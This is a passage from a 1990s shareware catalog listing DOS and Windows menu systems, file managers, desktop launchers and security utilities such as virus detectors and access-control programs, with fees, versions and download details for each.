Download size: 371k (about 28 minutes with a 2400 baud modem) + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 5000 lines long. User can update + and delete entries. Will print out opus for selected dates or + all. Full featured text editor with on line help. Import + feature for those who travel. Includes diary keeping tips. + + + Product: OMNIDay For Windows + For recording your thoughts & memoirs. See full description on + page 198. + + Product: WinJottr + Instant access desktop notetaker. See full description on + page 132. + + + 2.7 Menu systems & file managers + + See also: Utilities, Security programs, System activity + monitors, Computer usage monitors; Utilities, Security + programs, Computer access security; Communications, Networks. + + 2.7.1 Menu systems + + Product: A Batch View + Menus/msgs/info/utilities for DOS batch files. See full + description on page 95. + + Chapter 2, "Utilities" 149 + + + + Product: BATUTIL + Batch enhancement language. See full description on page 96. + + Product: clySmic Icon Bar + Author: clySmic Software + Version: 2.21 (01-04-96) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $24.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; bonus utilities; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; CB221.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76156,164 + for assistance). + SWREG#: 31 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + Icon button bar program launcher. Features variable size + buttons, nestable (tree-structured) sub-bars. Uses icons from + EXE/DLL/ICOs. Can set colors, clicks to launch, vertical or + horizontal bar, many other options. Has drag n' drop program + launch, also a drag 'n' drop add-program-to-bar function. Shows + correct icons for launched DOS programs. Has startup menu bar, + full Windows help and install, much more! + + + Product: DaMenu + Author: Just-In-Time Computing Services (John C. Skurka), + 607-539-6609 + Version: 2.01 (06-04-94) + Needs: IBM PC, DOS 3.3 or better. 314k RAM; CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 6); discounts on other products. 1-month free + upgrading allowed. + Look for: DAMENU20.ZIP on BBSs (call 607-533-7072 to download it + at no charge); DMENU2.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73020,3205 for assistance); + DAMENU20.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + This program has come into its own as a `truely simple' DOS + menu with features as: Submenu support, CD-ROM awareness, + online help, online registration, file browser, control panel, + application specific password protection, spacebar page + advance, customizable screen saver/blanker & even a desktop + + Chapter 2, "Utilities" 150 + + + + calculator. Other features include full mouse support, password + protection on `Exit to DOS' & menu mods, file preloading & 0k + memory overhead. + + + Product: DAYO MENU + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.14+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOME.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOME.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A simple DOS level menu system for use with the DAYO line of + Business Applications. Many features are available as menu + options, ie: 18 screen fonts, 25, 43, or 50 lines per page, + system statistics, view user manuals, and more. + + + Product: DOS Menu + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 2.21 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 192k RAM. + Strongly recommended: Hard disk. + Registration fee: $24.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: DOS221.ZIP on BBSs (call 216-661-9065 to download it at + no charge); DOS221.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + DOS221.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Easy to set up and use menu system for all versions of DOS. Can + handle up to 10,000 menu entries that can run any programs, + commands, or batch files. + + Chapter 2, "Utilities" 151 + + + + Product: Easy Menu + Author: Easy Software (John Turnbull), +44(0)1625-614669 + Version: 6.5 (08-30-95) + Needs: IBM PC, DOS 5.0 or better. 256k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; EM.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 5 (or contact userID 100410,717 for + assistance). + SWREG#: 3046 + PsL#: 11493 + Download size: 153k (about twelve minutes with a 2400 baud modem) + Description: + There are many hard disk menu systems but none as + straightforward and easy to use as this. It does not have "Menu + Pages". All items are on a single scrollable menu which can + hold up to 200 items and has alphabetic search. EM Unloads + competely during the call to a menu item so there is no memory + overhead. All items can be either Open Access or Administrator + only. The system can be locked by password to the open access + items. Users without the password cannot exit to DOS + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 109. + + Product: HDM - Hard Disk Menu + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 5.04 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 320k RAM. Uses 0K (no bytes) + when running a program/command/batch file. + Strongly recommended: Hard disk; Hayes-compatible modem; Mouse. + Registration fee: 50.00US$ (add 4.00US$ for shipping to U.S. + addresses) (add 5.00US$ for shipping to Canadian addresses) + (add 9.00US$ for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 1-month limited return + policy; LAN license; site license; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. 1-month free upgrading allowed. + Look for: HDM504.ZIP on BBSs (call 216-661-9065 to download it at + no charge); HDM504.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73057,3113 for assistance); + HDM504.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A DOS shell that hides the underlying operating system from + uninitiated users, yet does not get in the way of expert users. + Features: network & mouse support, multi-level security system, + usage logging and reporting, phone dialer, variable screen + blanker, automatic logon & logoff, timed execution, multi-user + + Chapter 2, "Utilities" 152 + + + + log on/off with passwords, extensive on-line help, file and + directory pick lists, user defined logo screen, DOS window, + pass keystrokes to user programs, 260,000 menu entries, not a + TSR. + + + Product: LAN Menu + Local Area Network menu for DOS based LANs. See full + description on page 370. + + Product: LegRoom + Make any program a TSR, swap to EMS/XMS/disk. See full + description on page 89. + + Product: New Menus for Windows + Author: Dipl.Ing. Roger Rene Kommer, 910-791-7052 + Version: 1.41 (11-29-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $20.00 + Registration benefits: lifetime unlimited BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: NMFW141E.ARJ on BBSs (call 49-561-5740777 to download + it at no charge); NM141E.E on CompuServe in CIS:WINSHARE forum + LIBrary 9 (or contact userID 100412,3624 for assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A Win-shell similar to the UNIX X-Windows Manger OpenLook, + Motif and the 'Chicago' GUI. With a graph. popup menu for a + quick access to apps docs, directories, tasks and more. + Enhances window managment with a Virtual Desktop, layout + functions and enhanced system menu. Provides customizable + context senstive menus. Every menu, even apps menus, can be + stuck onto the desktop. Multi-user configuration. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 371. + + Product: Open Menu + Author: P. C. Softsmith (Vic Williams), 604-433-5189 + Version: 2.5 (03-18-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: DBZ**.ZIP on BBSs (multiple files). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Flexible fast general purpose menu program. Easily used batch + file like script language (compatible with teleshare/dos) with + many commands per menu entry. User defined grouping. User + + Chapter 2, "Utilities" 153 + + + + changeable help and can be used as on-line help system, or + reference system. Autoloading up to 9999 menu entries in + standard dBase format. Includes teleshare gather remote file + management and support. + + + Product: UltiMenu + Menu system for DOS programs. See full description on + page 158. + + 2.7.2 File managers + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 24. + + Product: CMFiler + Author: NoVaSoft, 703-221-1833 + Version: 5.37d (07-15-95) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 12 months of phone, CompuServe, mail support; 3-month + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products; + discounts on upgrades; registration commissions. + Look for: CF537D.ZIP on BBSs (call 703-680-9269 to download it at + no charge); CMFILE.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 72130,1400 for assistance). + SWREG#: 15 + PsL#: 10657 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Excelent file manager for DOS. Acclaimed by PC Mag, DOS 6 + Secrets, Novell DOS 7 Unleashed. Split-screen display of + directory listings or trees, with full suite of dir and file + services in each mode. Built-in file editor, floppy disk + copier/formatter/scanner, menued launching facillity. Floppy + fill function, directory refresher, file split/join capability + and file notes facility add special power. Mouse and VGA + 25/43/50-line support, full color control. Fast! + + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: ExamineZip + Text retrieval program for ZIP archives. See full description + on page 14. + + Chapter 2, "Utilities" 154 + + + + Product: File Manager Jr. + Author: Charles R. Maher, 208-664-3864 + Version: 1.2 (12-07-94) + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; discounts on upgrades. + Look for: FMANJR12.ZIP on BBSs. + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + A file manager for WinWord 6.0. Perform more than a dozen + file-management operations without having to switch to the + Windows File Manager. Open, move, copy, delete and undelete + files in any number of Word subdirectories and sub- + subdirectories. Create, rename and delete directories. + + + Product: File Maven + Author: Kent Briggs + Version: 3.0 (03-14-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + CompuServe, mail support; discounts on upgrades. Parallel link + cable for file transfers. + Look for: FMAV30.ZIP on BBSs; FMAV30.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 0 (or contact userID 72124,3234 for + assistance). + SWREG#: 5014 + PsL#: 11917 + Download size: 166k (about 13 minutes with a 2400 baud modem) + Description: + An advanced DOS file manager and file transfer utility. + Features: Dual dir/pull down menus/50-line support, LapLink- + style file transfers via cable, ZIP/LHA/ARJ compressed file + support, ASCII/hex file viewer and text editor, file search, + split/join, date stamping, Blowfish encryption and secure file + wipe, context sensitive hypertext help system, Directory Maven + tree scanning/quick chdir, and much more! + + Chapter 2, "Utilities" 155 + + + + Product: File_Handle Filer/Finder/Shell + Author: Hasoft (Arjen van Andel), +31-(0)416-351-469 + Version: 2.10 (02-05-96) + Needs: IBM PC, DOS 3.1 or better. 420k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; Mouse. + Registration fee: US$27.95 (add US$5.00 for shipping to U.S. + addresses) (add US$5.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe, mail support; 3-month return + policy; bonus graphics; bonus templates; discounts on upgrades. + Look for: FHD*.* on BBSs; FHD.ZIP on CompuServe in CIS:PCUTIL + forum LIBrary 5 (or contact userID 100710,1352 for assistance). + SWREG#: 8984 + Download size: 238k (about 18 minutes with a 2400 baud modem) + Description: + Integrated file/program manager and multiple-argument file + finder with global properties. Links to your apps and tools. + Embedded wildcards navigate through files and trees and locate + or select files. Side by side compare. Extensive select and + sort. Touch files, change disk labels and attributes. Tree + sizes. Mouse support. Unarchiving shell. More. Lite and Regular + versions available. + + + Product: FILE_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 4.30 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: FMAN430.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + A menu driven utility program that aids in managing disk files. + Directory and file names are displayed in sorted order with + file names sorted by name, extension, date or size. Single + files or groups may be quickly marked and then acted upon. The + actions include copy, move, spawn, append, erase, rename, + change attribute status, display, print and locate. Features + include context sensitive help, macro procedures, directory + tree, diskette labels and program parameter customization. + + Chapter 2, "Utilities" 156 + + + + Product: Keyed File System (OS/2) + Subroutines for keyed file support in OS/2. See full + description on page 387. + + Product: PocketD Plus + Author: PocketWare (Jeff Rollason), +44-81-203-3731 + Version: 4.2 (11-05-94) + Needs: IBM PC, DOS 2.1 or better. 65k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $49.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 24 months of unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Look for: POCK.ZIP on BBSs (call 619-755-7357 to download it at + no charge); POCK.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 3 (or contact userID 100031,3537 for assistance); POCK.ZIP on + GEnie in IBMPC forum LIBrary 0. + SWREG#: 1017 + PsL#: 10474 + Download size: 167k (about 13 minutes with a 2400 baud modem) + Description: + What PC's "Best Utility 1994" joint runner-up with Stacker 4.0 + and PsL's "Best Utility 1992". Tiny but superb color dir + lister, file COPY and immensely powerful file manager allowing + the user to quickly & easily carry out automated tasks either + too difficult or impossible by other means. Over 220+ options + from command-line or menu-driven interface. Full arch/dir + browsing, ZIP,ARC,PAK,ZOO,ARJ,LZH,SFX, COPY (23 options), + multiple display/exec template(s) (50 params), OS/2 & 4DOS, & + much more. + + + Product: QFiler + Author: Jamestown Software, 608-271-2090 + Version: 3.2 (07-15-91) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Look for: QF*.* on BBSs (multiple files) (call 608-271-3685 to + download it at no charge); QF32*.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 5 (or contact userID 74275,745 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + This powerful file manager displays two sorted directories + side-by-side. Copy, rename, move or delete both files and + directories. View file contents in ascii or hex. View and print + directory tree. Find files on any drive. Create and remove + subdirectories. Locate duplicate files. Set or clear file + + Chapter 2, "Utilities" 157 + + + + attributes. Change time/date stamps. Simplify use of file + compression utilities like LHA and PKZip. Rename disk volume + labels. Undelete or edit files. XCopy directories. Send files + to print queue. + + + Product: QRead + Read any text file w/ font sizing in Win 3.1. See full + description on page 50. + + Product: QRead for Windows 95 + Read any text file w/ font sizing. See full description on + page 50. + + Product: UltiMenu + Menu system for DOS programs. See full description on + page 158. + + Product: x-FILE3 + Network file management system. See full description on + page 365. + + 2.7.3 Combined MS/FMs + + Product: ABmenu + Author: Abri Technologies, Inc. + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 10k RAM. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support; bonus utilities; discounts on + upgrades; registration commissions. + Look for: availability unknown on BBSs; ABMENU.EXE on CompuServe + in CIS:PCUTIL forum LIBrary 5 (or contact userID 72345,1623 for + assistance). + Download size: 126k (about ten minutes with a 2400 baud modem) + Description: + A simple, fast, stay-in-DOS program menu and/or drive/directory + hoper. Directories, programs and descriptions easily added or + deleted from menu list - right on the DOS line with the simple + "D" command. No editing, compiling, etc. + + + Product: CMFiler + File manager for DOS. See full description on page 153. + + Product: Double Directory + File/disk manager; 2 directories side-by-side. See full + description on page 26. + + Chapter 2, "Utilities" 158 + + + + Product: ENTER-EASE + Author: KAYL SOFTWARE + Version: 1.1 (09-29-94) + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, mail support; lifetime return + policy; bonus utilities; all ASP-wide offers (see page 6). + Attractive carrying case. + Look for: ENTER_E.ZIP on BBSs; ENTERE.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 5; ENTER_E.ZIP on GEnie in IBMPC forum + LIBrary 15. + PsL#: 11567 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Makes DOS better than Windows. This DOS shell lets you manage + your hard disk without having to learn complex commands or + answer needless questions. It displays the key needed to + activate a command on the screen so there is no memorization + necessary. All the keys are centered around the numeric keypad + so if you can't type you can still initiate commands quickly, + much faster than with a mouse. You can do all your file + management, and much more, while drinking coffee! + + + Product: Hard Disk Director + Author: Canyon Software (Dan Baumbach), 415-382-7999 + Version: 5.2 (03-15-92) + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Registration fee: $40.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support. + Look for: availability unknown on BBSs; HDD1.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 5 (multiple files) (or contact userID + 74774,554 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A series of programs making up a complete hard disk menu, shell + and file manager. + DL.EXE full featured shell. You can mark selected + directories or files for copying, moving or + removing. + DB.EXE gives you a sorted file list for any directory. + DA.EXE shows you all the files on a particular drive or + drives. + DM full featured hard disk menu. You can add up to + 20 entries to the main menu and have unlimited + submenus of up to 20 entries each. + + Chapter 2, "Utilities" 159 + + + + Product: Katelin Comment Manager + Full featured file/comment manager. See full description on + page 48. + + Product: UltiMenu + Author: Ron Janorkar, 212-334-1243 + Version: 1.00 (08-19-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Hayes-compatible modem; + Mouse. + Registration fee: $25.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support. + Look for: UMENU100.ZIP on BBSs (call 718-716-6198 to download it + at no charge); UMENU100.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Removes itself completely from system memory for running + programs; 18 categories with up to 18 programs per category are + supported; mouse support; fully configurable; context sensitive + on-line help; offers many built in utilities such as a file + handler, screen blanker, contact manager and label manager. + + + 2.7.4 Work environment managers + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 102. + + Product: Button Manager for Windows + Author: AKC Applied Knowledge Corporation (Darin Ellis), + 613-841-6020 + Version: 1.3b (01-10-95) + Needs: IBM 80386, Windows 3.1 or better. Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, CompuServe, mail support; 3-month limited return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: SMLBMG.ZIP on BBSs; SMLBMG.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 9 (or contact userID 70252,1364 for + assistance). + SWREG#: 2823 + PsL#: 11559 + Download size: 155k (about twelve minutes with a 2400 baud modem) + Description: + A multi-icon-bar Windows utility that provides quick access to + applications. Program Manager groups and icons are + automatically reflected; each group becomes a resizable button + bar that can separately be opened and placed anywhere on the + desktop. Program desc shown in title bar as cursor glides over + each icon. Designate some or all to stay on top, min, max, or + + Chapter 2, "Utilities" 160 + + + + cascade. Desktop set-up remembered. Professional installation + program sets up application and icons in one minute. No other + setup required. + + + Product: New Menus for Windows + X-Win/Win4 like shell and desktop enhancement. See full + description on page 152. + + Product: Program Group Specialist + Author: MIS Resources International (Wayne Edwards), + 404-594-7500 + Version: 1.0 (05-23-95) + Needs: IBM AT (80286), Windows 3.1 or better. CGA monitor; + Mouse; VBRUN300.DLL. + Registration fee: $20.00 (add $2.50 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + LAN license; site license; all ASP-wide offers (see page 6). + 6-month free upgrading allowed. + Look for: availability unknown on BBSs; RIGS10.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 4 (or contact userID 75350,205 + for assistance). + Download size: 48k (about four minutes with a 2400 baud modem) + Description: + RI-group Specialist makes adding icons to your Program Manager + simple: select a group to add to and then double click on the + program you want to add. Fully functional. + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 171. + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 380. + + 2.7.5 Software tools + + 2.7.5.1 For multiple programs + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 94. + + Chapter 2, "Utilities" 161 + + + + 2.8 Security programs + + "Shareware is as safe as [retail] software if obtained + directly from an author or from a vendor or BBS who + has gotten the disk directly from the author." + - an official ASP statement on shareware + + + See also: Utilities, File utilities, Backup/restore; Utilities, + File utilities, File encryption; Utilities, File utilities, + File archiving & compression; Utilities, File utilities, File + comparison; Utilities, System utilities, Recovery utilities. + + Product: DaMenu + A premier point & shoot DOS menu. See full description on + page 149. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 151. + + 2.8.1 Virus/Trojan detectors + + Product: FileSafe + Easy, foolproof virus detection system. See full description + on page 163. + + Product: Flu_Shot+ + Author: Software Concepts Design, 914-586-2023 + Version: 1.83 (07-11-93) + Needs: IBM PC, DOS 2.1 or better. 16k RAM. + Strongly recommended: CGA monitor; Hercules monitor. + Registration fee: $15.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, BBS, CompuServe, GEnie, mail support; + discounts on upgrades. + Look for: FSP*.ZIP on BBSs (call 212-889-6438 to download it at + no charge); FSP*.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 3 (or contact userID 72461,3212 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An active monitoring program for detecting and preventing + computer viruses and insures the integrity of the programs you + use on your system. By selecting the various levels of + protection you wish to install on your system, you can be sure + that the program you are about to run is only the program you + wanted to run and does not contain any computer viruses. + + Winner of PC Magazine's Editor Choice award. Updated on a + regular basis. + + Chapter 2, "Utilities" 162 + + + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 89. + + Product: Virus Simulator + Author: Rosenthal Engineering (Doren Rosenthal), 805-541-0910 + Version: 2C (01-01-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited fax, mail support; LAN license; bonus + utilities; all ASP-wide offers (see page 6). Bonus "MtE", Boot + sector, & companion virus supplements. + Look for: VIRSIM2C.ZIP on BBSs (multiple files) (call + 805-258-6172 to download it at no charge). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Safely demonstrate your anti-virus protection. Selected as + + + 2.8.2 System activity monitors + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 161. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 279. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 89. + + 2.8.2.1 Computer usage monitors + + See also: Utilities, Menu systems & file managers. + + Chapter 2, "Utilities" 163 + + + + Product: Red Hand + Author: Hard-Drive Software, +44-O1963-351470 + Version: 1.0 (04-11-96) + Needs: IBM 80386, Windows 3.1 or better. EGA monitor; Hard disk; + Mouse. + Registration fee: L-12.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, fax, mail support; + 1-month return policy; all ASP-wide offers (see page 6). 1 + free update disk(s) sent out. + Look for: REDHAND.ZIP on BBSs. + Download size: 874k (about 65 minutes with a 2400 baud modem) + Description: + Tells you exactly what someone did on your computer while you + were away, and they won't even know they were being watched! + + * Records activity on your (or anybody elses computer) + discretely. + * Log can be viewed and printed. + * Undetectable and unstoppable to the casual user + * Essential for Parents, Managers, Teachers, Security + Firms.. etc. etc. + + Will not change your system files, perfectly safe and easily + deletable - in the unlikely event that you will want to! + + + 2.8.3 File integrity monitors + + Product: FileSafe + Author: JAYAR Systems, 416-751-5678 + Version: 1.02 (05-15-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus utilities; all ASP-wide + offers (see page 6). + Look for: FLSF102.ZIP on BBSs (call 519-940-0007 to download it + at no charge). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A virus detection system that protects your computer from virus + attack by alerting you to unexpected changes in your executable + files or boot record. Unlike other CRC-based utilities, this + uses a sophisticated message digest algorithm that cannot be + inverted. FileSafe can detect any changes no matter how well + covered. FileSafe is easy to use, unobtrusive, takes up little + + Chapter 2, "Utilities" 164 + + + + space and comes with a comprehensive users manual that + discusses viruses and strategies for using FileSafe. + + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 161. + + Product: Master Disk + Prepares diskette masters for duplication. See full + description on page 22. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 38. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 89. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 162. + + 2.8.4 Computer access security + + See also: Utilities, Menu systems & file managers. + + Product: DATA PROTECTOR + Author: PIGAS INC. + Version: 2.02 (11-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of fax, + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: PIGAS.ZIP on BBSs; PIGAS.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 72172,2063 for + assistance). + PsL#: 11015 + Download size: 225k (about 17 minutes with a 2400 baud modem) + Description: + Protect the information and access to programs in your PC + against unauthorized access. The protected data becomes totally + unavailable even when using a powerful disk utility or booting + from a diskette. Unlimited number of users, each one having a + unique password. Full report about authorized/unauthorized + activity in the system. Fast hide/open operation. Simple call + to login/logout program to start or end a user session. + + + Product: Kidproof for Windows + Secure desktop for kids. See full description on page 111. + + Chapter 2, "Utilities" 165 + + + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 279. + + Product: Red Hand + Activity recorder, tracks unauthorised useage. See full + description on page 162. + + Product: WinSecure + Personal screensaver w/password & messages. See full + description on page 68. + + + 2.9 Special needs + + 2.9.1 Vision-impaired utilities + + Product: QRead + Read any text file w/ font sizing in Win 3.1. See full + description on page 50. + + Product: QRead for Windows 95 + Read any text file w/ font sizing. See full description on + page 50. + + + 2.10 Software tools & add-ins + + 